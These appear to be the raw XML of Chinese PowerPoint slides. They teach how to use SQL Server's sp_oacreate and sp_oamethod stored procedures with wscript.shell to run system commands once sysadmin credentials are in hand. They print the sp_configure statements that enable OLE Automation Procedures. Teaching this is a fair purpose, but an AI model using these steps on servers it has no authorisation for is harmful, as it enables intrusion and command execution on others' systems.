          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7316310" y="4945350"/>
            <a:ext cx="4057993" cy="1683613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6399202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8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432647" y="3730414"/>
            <a:ext cx="8090747" cy="4924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defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="38164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扩展存储过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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存储过程是一组为了完成特定功能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句集合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，经编译后存储在数据库中，用户通过指定存储过程的名称并给出参数来执行。存储过程中可以包含逻辑控制语句和数据操纵语句，它可以接受参数、输出参数、返回单个或多个结果集以及返回值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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由于存储过程在创建时即在数据库服务器上进行了编译并存储在数据库中，所以存储过程运行要比单个的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句块要快。同时由于在调用时只需用提供存储过程名和必要的参数信息，所以在一定程度上也可以减少网络流量、简单网络负担。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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存储过程分为：系统存储过程、本地存储过程、扩展存储过程、远程存储过程、临时存储过程。</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2"/>
            <a:ext cx="11035409" cy="48013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系统存储过程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系统存储过程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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</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开头，进行系统的设定。如：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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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sp_oamethod</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利用条件：</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dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>已获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sqlserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>权限用户的账号与密码且未降权（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>用户权限为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mssqlserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，已降权）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.sqlserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>允许远程连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3.OLE Automation Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>选项开启</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的实例。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是调用一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的方法。</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组合</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可执行命令无回显。</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33841313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2"/>
            <a:ext cx="11035409" cy="320087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系统存储过程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系统存储过程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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</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开头，进行系统的设定。如：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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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sp_oamethod</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的实例。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是调用一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的方法。</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组合</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行命令无回显。</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启用</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sp_oacreate</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534229" y="4473560"/>
            <a:ext cx="4455713" cy="110799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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'show advanced options', 1;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>RECONFIGURE WITH OVERRIDE;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'Ole Automation Procedures', 1;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>RECONFIGURE WITH OVERRIDE;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9716946-5CF2-44E6-B0B1-1E094404D7B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386865" y="4323509"/>
            <a:ext cx="6461249" cy="1852337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23710504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1"/>
            <a:ext cx="11035409" cy="33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系统存储过程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系统存储过程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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</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开头，进行系统的设定。如：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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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sp_oamethod</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统存储过程可以用于对文件删除、复制、移动等操作，可配合</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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统存储过程调用系统</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wscript.shell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来执行系统命令。</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
